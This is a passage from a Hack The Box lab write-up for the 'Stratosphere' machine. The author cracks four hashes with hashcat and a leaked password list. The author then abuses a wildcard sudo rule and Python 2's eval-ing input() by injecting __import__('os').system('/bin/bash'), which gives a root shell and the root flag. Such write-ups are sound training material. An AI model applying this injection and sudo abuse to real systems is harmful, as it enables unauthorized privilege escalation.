u505@naos:~/HTB/Machines/Stratosphere$ cat hash.md5 5af003e100c80923ec04d65933d382cb u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 0 hash.md5 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 0 hash.md5 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show 5af003e100c80923ec04d65933d382cb:kaybboo! u505@naos:~/HTB/Machines/Stratosphere$ echo "d24f6fb449855ff42344feff18ee2819033529ff" > hash.sha1 u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 100 hash.sha1 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 100 hash.sha1 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show d24f6fb449855ff42344feff18ee2819033529ff:ninjaabisshinobi u505@naos:~/HTB/Machines/Stratosphere$ echo 91ae5fc9ecbca9d346225063f23d2bd9 > hash.md4 u505@naos:~/HTB/Machines/Stratosphere$ hashcat --example-hashes | grep -A 3 -B 1 MD4 MODE: 900 TYPE: MD4 HASH: afe04867ec7a3845145579a95f72eca7 PASS: hashcat
-- TYPE: MS-AzureSync PBKDF2-HMAC-SHA256 HASH: v1;PPH1_MD4,54188415275183448824,100,55b530f052a9af79a7ba9c466dddcb8b116f8babf6c3873a51a3898fb008e123 PASS: hashcat
MODE: 12900 u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 900 hash.md4 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 900 hash.md4 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show 91ae5fc9ecbca9d346225063f23d2bd9:legend72 u505@naos:~/HTB/Machines/Stratosphere$ hashcat --example-hashes | grep -A 2 -B 1 BLAKE MODE: 600 TYPE: BLAKE2b-512 HASH: $BLAKE2$296c269e70ac5f0095e6fb47693480f0f7b97ccd0307f5c3bfa4df8f5ca5c9308a0e7108e80a0a9c0ebb715e8b7109b072046c6cd5e155b4cfd2f27216283b1e PASS: hashcat u505@naos:~/HTB/Machines/Stratosphere$ echo '$BLAKE2$9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943' > hash.blake u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 600 hash.blake /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt u505@naos:~/HTB/Machines/Stratosphere$ hashcat -m 600 hash.blake /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show $BLAKE2$9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943:Fhero6610
Challenge execution
richard@stratosphere:~$ sudo /usr/bin/python /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
kaybboo!
You got it!
Now what's this one? d24f6fb449855ff42344feff18ee2819033529ff
ninjaabisshinobi
WOW, you're really good at this!
How about this? 91ae5fc9ecbca9d346225063f23d2bd9
legend72
OK, OK! I get it. You know how to crack hashes...
Last one, I promise: 9efebee84ba0c5e030147cfd1660f5f2850883615d444ceecf50896aae083ead798d13584f52df0179df0200a3e1a122aa738beff263b49d2443738eba41c943
Fhero6610
sh: 1: /root/success.py: not found
The challenge was funny, but the script success.py doesn't exist.
Abuse of test.py
The script test.py invoke the function input. As we can see on the python documentation, in python 2.7 the function input is equivalent to eval(raw_input(prompt)). In python 2 it is possible to have code execution on the input function prompt.
richard@stratosphere:~$ ls -l /usr/bin/python*
lrwxrwxrwx 1 root root 16 Feb 11 2018 /usr/bin/python -> /usr/bin/python3
lrwxrwxrwx 1 root root 9 Jan 24 2017 /usr/bin/python2 -> python2.7
-rwxr-xr-x 1 root root 3779512 Nov 24 2017 /usr/bin/python2.7
lrwxrwxrwx 1 root root 9 Jan 20 2017 /usr/bin/python3 -> python3.5
-rwxr-xr-x 2 root root 4747120 Jan 19 2017 /usr/bin/python3.5
-rwxr-xr-x 2 root root 4747120 Jan 19 2017 /usr/bin/python3.5m
lrwxrwxrwx 1 root root 10 Jan 20 2017 /usr/bin/python3m -> python3.5m
The sudo command allows the execution of python 2, because of the *. If we try to execute the command whoami instead of the correct answer, the script execute the command.
richard@stratosphere:~$ python2 test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('whoami')
richard
Traceback (most recent call last):
File "test.py", line 38, in <module>
question()
File "test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
We are allowed to execute the command with sudo.
richard@stratosphere:~$ sudo /usr/bin/python2 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('whoami')
root
Traceback (most recent call last):
File "/home/richard/test.py", line 38, in <module>
question()
File "/home/richard/test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
If we execute the command /bin/bash, we obtain a shell as root.
richard@stratosphere:~$ sudo /usr/bin/python2 /home/richard/test.py
Solve: 5af003e100c80923ec04d65933d382cb
__import__('os').system('/bin/bash')
root@stratosphere:/home/richard# whoami
root
root@stratosphere:/home/richard# cat /root/root.txt
<ROOT_FLAG>
root@stratosphere:/home/richard# exit
exit
Traceback (most recent call last):
File "/home/richard/test.py", line 38, in <module>
question()
File "/home/richard/test.py", line 8, in question
md5.update(q1.encode())
AttributeError: 'int' object has no attribute 'encode'
References
- https://www.cvedetails.com/cve/CVE-2017-5638/
- netstat without netstat
- Vulnerability in input() function – Python 2.x
- Python How To Import And Use Module With One Line
Daniel Simao 09:07, 21 January 2021 (EST)
